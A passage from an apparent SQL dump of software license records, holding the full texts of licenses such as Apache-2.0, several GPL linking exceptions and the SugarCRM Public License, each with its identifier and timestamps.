Agreement.\nThe above applies to the Derivative Work as incorporated in a Collective Work,\nbut this does not require the Collective Work apart from the Derivative Work\nitself to be made subject to the terms of this License.\n\nc. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nd. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; to the extent reasonably practicable, the Uniform\nResource Identifier, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n e. For the avoidance of doubt, where the Work is a musical composition:\n\ni. Performance Royalties Under Blanket Licenses. Licensor reserves the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work if that performance is primarily intended\nfor or directed toward commercial advantage or private monetary compensation.\n\nii. Mechanical Rights and Statutory Royalties. Licensor reserves the exclusive\nright to collect, whether individually or via a music rights agency or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions), if Your distribution of such cover version is primarily\nintended for or directed toward commercial advantage or private monetary compensation.\n\nf. Webcasting Rights and Statutory Royalties. For the avoidance of doubt,\nwhere the Work is a sound recording, Licensor reserves the exclusive right\nto collect, whether individually or via a performance-rights society (e.g.\nSoundExchange), royalties for the public digital performance (e.g. webcast)\nof the Work, subject to the compulsory license created by 17 USC Section 114\nof the US Copyright Act (or the equivalent in other jurisdictions), if Your\npublic digital performance is primarily intended for or directed toward commercial\nadvantage or private monetary compensation.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(166,'Apache-2.0','Apache License\n\nVersion 2.0, January 2004\n\nhttp://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION,\nAND DISTRIBUTION\n\n 1. Definitions.\n\n \n\n\"License\" shall mean the terms and conditions for use, reproduction, and distribution\nas defined by Sections 1 through 9 of this document.\n\n \n\n\"Licensor\" shall mean the copyright owner or entity authorized by the copyright\nowner that is granting the License.\n\n \n\n\"Legal Entity\" shall mean the union of the acting entity and all other entities\nthat control, are controlled by, or are under common control with that entity.\nFor the purposes of this definition, \"control\" means (i) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (ii) ownership of fifty percent (50%) or more\nof the outstanding shares, or (iii) beneficial ownership of such entity.\n\n \n\n\"You\" (or \"Your\") shall mean an individual or Legal Entity exercising permissions\ngranted by this License.\n\n \n\n\"Source\" form shall mean the preferred form for making modifications, including\nbut not limited to software source code, documentation source, and configuration\nfiles.\n\n \n\n\"Object\" form shall mean any form resulting from mechanical transformation\nor translation of a Source form, including but not limited to compiled object\ncode, generated documentation, and conversions to other media types.\n\n \n\n\"Work\" shall mean the work of authorship, whether in Source or Object form,\nmade available under the License, as indicated by a copyright notice that\nis included in or attached to the work (an example is provided in the Appendix\nbelow).\n\n \n\n\"Derivative Works\" shall mean any work, whether in Source or Object form,\nthat is based on (or derived from) the Work and for which the editorial revisions,\nannotations, elaborations, or other modifications represent, as a whole, an\noriginal work of authorship. For the purposes of this License, Derivative\nWorks shall not include works that remain separable from, or merely link (or\nbind by name) to the interfaces of, the Work and Derivative Works thereof.\n\n \n\n\"Contribution\" shall mean any work of authorship, including the original version\nof the Work and any modifications or additions to that Work or Derivative\nWorks thereof, that is intentionally submitted to Licensor for inclusion in\nthe Work by the copyright owner or by an individual or Legal Entity authorized\nto submit on behalf of the copyright owner. For the purposes of this definition,\n\"submitted\" means any form of electronic, verbal, or written communication\nsent to the Licensor or its representatives, including but not limited to\ncommunication on electronic mailing lists, source code control systems, and\nissue tracking systems that are managed by, or on behalf of, the Licensor\nfor the purpose of discussing and improving the Work, but excluding communication\nthat is conspicuously marked or otherwise designated in writing by the copyright\nowner as \"Not a Contribution.\"\n\n \n\n\"Contributor\" shall mean Licensor and any individual or Legal Entity on behalf\nof whom a Contribution has been received by Licensor and subsequently incorporated\nwithin the Work.\n\n2. Grant of Copyright License. Subject to the terms and conditions of this\nLicense, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive,\nno-charge, royalty-free, irrevocable copyright license to reproduce, prepare\nDerivative Works of, publicly display, publicly perform, sublicense, and distribute\nthe Work and such Derivative Works in Source or Object form.\n\n3. Grant of Patent License. Subject to the terms and conditions of this License,\neach Contributor hereby grants to You a perpetual, worldwide, non-exclusive,\nno-charge, royalty-free, irrevocable (except as stated in this section) patent\nlicense to make, have made, use, offer to sell, sell, import, and otherwise\ntransfer the Work, where such license applies only to those patent claims\nlicensable by such Contributor that are necessarily infringed by their Contribution(s)\nalone or by combination of their Contribution(s) with the Work to which such\nContribution(s) was submitted. If You institute patent litigation against\nany entity (including a cross-claim or counterclaim in a lawsuit) alleging\nthat the Work or a Contribution incorporated within the Work constitutes direct\nor contributory patent infringement, then any patent licenses granted to You\nunder this License for that Work shall terminate as of the date such litigation\nis filed.\n\n4. Redistribution. You may reproduce and distribute copies of the Work or\nDerivative Works thereof in any medium, with or without modifications, and\nin Source or Object form, provided that You meet the following conditions:\n\n(a) You must give any other recipients of the Work or Derivative Works a copy\nof this License; and\n\n(b) You must cause any modified files to carry prominent notices stating that\nYou changed the files; and\n\n(c) You must retain, in the Source form of any Derivative Works that You distribute,\nall copyright, patent, trademark, and attribution notices from the Source\nform of the Work, excluding those notices that do not pertain to any part\nof the Derivative Works; and\n\n(d) If the Work includes a \"NOTICE\" text file as part of its distribution,\nthen any Derivative Works that You distribute must include a readable copy\nof the attribution notices contained within such NOTICE file, excluding those\nnotices that do not pertain to any part of the Derivative Works, in at least\none of the following places: within a NOTICE text file distributed as part\nof the Derivative Works; within the Source form or documentation, if provided\nalong with the Derivative Works; or, within a display generated by the Derivative\nWorks, if and wherever such third-party notices normally appear. The contents\nof the NOTICE file are for informational purposes only and do not modify the\nLicense. You may add Your own attribution notices within Derivative Works\nthat You distribute, alongside or as an addendum to the NOTICE text from the\nWork, provided that such additional attribution notices cannot be construed\nas modifying the License.\n\nYou may add Your own copyright statement to Your modifications and may provide\nadditional or different license terms and conditions for use, reproduction,\nor distribution of Your modifications, or for any such Derivative Works as\na whole, provided Your use, reproduction, and distribution of the Work otherwise\ncomplies with the conditions stated in this License.\n\n5. Submission of Contributions. Unless You explicitly state otherwise, any\nContribution intentionally submitted for inclusion in the Work by You to the\nLicensor shall be under the terms and conditions of this License, without\nany additional terms or conditions. Notwithstanding the above, nothing herein\nshall supersede or modify the terms of any separate license agreement you\nmay have executed with Licensor regarding such Contributions.\n\n6. Trademarks. This License does not grant permission to use the trade names,\ntrademarks, service marks, or product names of the Licensor, except as required\nfor reasonable and customary use in describing the origin of the Work and\nreproducing the content of the NOTICE file.\n\n7. Disclaimer of Warranty. Unless required by applicable law or agreed to\nin writing, Licensor provides the Work (and each Contributor provides its\nContributions) on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied, including, without limitation, any warranties\nor conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR\nA PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness\nof using or redistributing the Work and assume any risks associated with Your\nexercise of permissions under this License.\n\n8. Limitation of Liability. In no event and under no legal theory, whether\nin tort (including negligence), contract, or otherwise, unless required by\napplicable law (such as deliberate and grossly negligent acts) or agreed to\nin writing, shall any Contributor be liable to You for damages, including\nany direct, indirect, special, incidental, or consequential damages of any\ncharacter arising as a result of this License or out of the use or inability\nto use the Work (including but not limited to damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses), even if such Contributor has been advised of the possibility\nof such damages.\n\n9. Accepting Warranty or Additional Liability. While redistributing the Work\nor Derivative Works thereof, You may choose to offer, and charge a fee for,\nacceptance of support, warranty, indemnity, or other liability obligations\nand/or rights consistent with this License. However, in accepting such obligations,\nYou may act only on Your own behalf and on Your sole responsibility, not on\nbehalf of any other Contributor, and only if You agree to indemnify, defend,\nand hold each Contributor harmless for any liability incurred by, or claims\nasserted against, such Contributor by reason of your accepting any such warranty\nor additional liability. END OF TERMS AND CONDITIONS\n\nAPPENDIX: How to apply the Apache License to your work.\n\nTo apply the Apache License to your work, attach the following boilerplate\nnotice, with the fields enclosed by brackets \"[]\" replaced with your own identifying\ninformation. (Don\'t include the brackets!) The text should be enclosed in\nthe appropriate comment syntax for the file format. We also recommend that\na file or class name and description of purpose be included on the same \"printed\npage\" as the copyright notice for easier identification within third-party\narchives.\n\nCopyright [yyyy] [name of copyright owner]\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\n\nyou may not use this file except in compliance with the License.\n\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\n\ndistributed under the License is distributed on an \"AS IS\" BASIS,\n\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\nSee the License for the specific language governing permissions and\n\nlimitations under the License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(167,'Afmparse','(C) 1988, 1989 by Adobe Systems Incorporated. All rights reserved.\n\nThis file may be freely copied and redistributed as long as:\n\n 1) This entire notice continues to be included in the file,\n\n2) If the file has been modified in any way, a notice of such modification\nis conspicuously indicated.\n\nPostScript, Display PostScript, and Adobe are registered trademarks of Adobe\nSystems Incorporated.\n\nTHE INFORMATION BELOW IS FURNISHED AS IS, IS SUBJECT TO CHANGE WITHOUT NOTICE,\nAND SHOULD NOT BE CONSTRUED AS A COMMITMENT BY ADOBE SYSTEMS INCORPORATED.\nADOBE SYSTEMS INCORPORATED ASSUMES NO RESPONSIBILITY OR LIABILITY FOR ANY\nERRORS OR INACCURACIES, MAKES NO WARRANTY OF ANY KIND (EXPRESS, IMPLIED OR\nSTATUTORY) WITH RESPECT TO THIS INFORMATION, AND EXPRESSLY DISCLAIMS ANY AND\nALL WARRANTIES OF MERCHANTABILITY, FITNESS FOR PARTICULAR PURPOSES AND NONINFRINGEMENT\nOF THIRD PARTY RIGHTS.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(168,'Autoconf-exception-3.0','AUTOCONF CONFIGURE SCRIPT EXCEPTION\n\nVersion 3.0, 18 August 2009\n\nCopyright © 2009 Free Software Foundation, Inc. <http://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\n\nThis Exception is an additional permission under section 7 of the GNU General Public License, version 3 (\"GPLv3\"). It applies to a given file that bears a notice placed by the copyright holder of the file stating that the file is governed by GPLv3 along with this Exception.\n\nThe purpose of this Exception is to allow distribution of Autoconf\'s typical output under terms of the recipient\'s choice (including proprietary).\n\n 0. Definitions.\n\n \"Covered Code\" is the source or object code of a version of Autoconf that is a covered work under this License.\n\n \"Normally Copied Code\" for a version of Autoconf means all parts of its Covered Code which that version can copy from its code (i.e., not from its input file) into its minimally verbose, non-debugging and non-tracing output.\n\n \"Ineligible Code\" is Covered Code that is not Normally Copied Code.\n\n 1. Grant of Additional Permission.\n\n You have permission to propagate output of Autoconf, even if such propagation would otherwise violate the terms of GPLv3. However, if by modifying Autoconf you cause any Ineligible Code of the version you received to become Normally Copied Code of your modified version, then you void this Exception for the resulting covered work. If you convey that resulting covered work, you must remove this Exception in accordance with the second paragraph of Section 7 of GPLv3.\n\n 2. No Weakening of Autoconf Copyleft.\n\n The availability of this Exception does not imply any general presumption that third-party software is unaffected by the copyleft requirements of the license of Autoconf.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(169,'GCC-exception-2.0','In addition to the permissions in the GNU Library General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those programs without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into another program .)\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(170,'Classpath-exception-2.0','Linking this library statically or dynamically with other modules is making a combined work based on this library. Thus, the terms and conditions of the GNU General Public License cover the whole combination.\n\nAs a special exception, the copyright holders of this library give you permission to link this library with independent modules to produce an executable, regardless of the license terms of these independent modules, and to copy and distribute the resulting executable under terms of your choice, provided that you also meet, for each linked independent module, the terms and conditions of the license of that module. An independent module is a module which is not derived from or based on this library. If you modify this library, you may extend this exception to your version of the library, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(171,'SugarCRM-1.1.3','SUGARCRM PUBLIC LICENSE Applies to Sugar Open Source Edition v1 through v4.\nPlease note that these releases are no longer supported or distributed.\n\nVersion 1.1.3\n\nThe SugarCRM Public License Version (\"SPL\") consists of the Mozilla Public\nLicense Version 1.1, modified to be specific to SugarCRM, with the Additional\nTerms in Exhibit B. The original Mozilla Public License 1.1 can be found at:\nhttp://www.mozilla.org/MPL/MPL-1.1.html\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n 2.2. Contributor Grant.\n\nSubject to third party intellectual property claims, each Contributor hereby\ngrants You a world-wide, royalty-free, non-exclusive license\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n 3. Distribution Obligations.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has knowledge of patent licenses which\nare reasonably necessary to implement that API, Contributor must also include\nthis information in the LEGAL file.\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"LEGAL\" which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Covered Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Code. However,\nYou may do so only on Your own behalf, and not on behalf of the Initial Developer\nor any Contributor. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code or ownership rights under a license of Your choice,\nwhich may contain terms different from this License, provided that You are\nin compliance with the terms of this License and that the license for the\nExecutable version does not attempt to limit or alter the recipient\'s rights\nin the Source Code version from the rights set forth in this License. If You\ndistribute the Executable version under a different license You must make\nit absolutely clear that any terms which differ from this License are offered\nby You alone, not by the Initial Developer or any Contributor. You hereby\nagree to indemnify the Initial Developer and every Contributor for any liability\nincurred by the Initial Developer or such Contributor as a result of any such\nterms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n6.2. Effect of New Versions. Once Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by SugarCRM.\nNo one other than SugarCRM has the right to modify the terms applicable to\nCovered Code created under this License.\n\n6.3. Derivative Works. If You create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), You must (a) rename Your license so that the\nphrases \"SugarCRM\", \"SPL\" or any confusingly similar phrase do not appear\nin your license (except to note that your license differs from this License)\nand (b) otherwise make it clear that Your version of the license contains\nterms which differ from the SugarCRM Public License. (Filling in the name\nof the Initial Developer, Original Code or Contributor in the notice described\nin Exhibit A shall not of themselves be deemed to be modifications of this\nLicense.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL 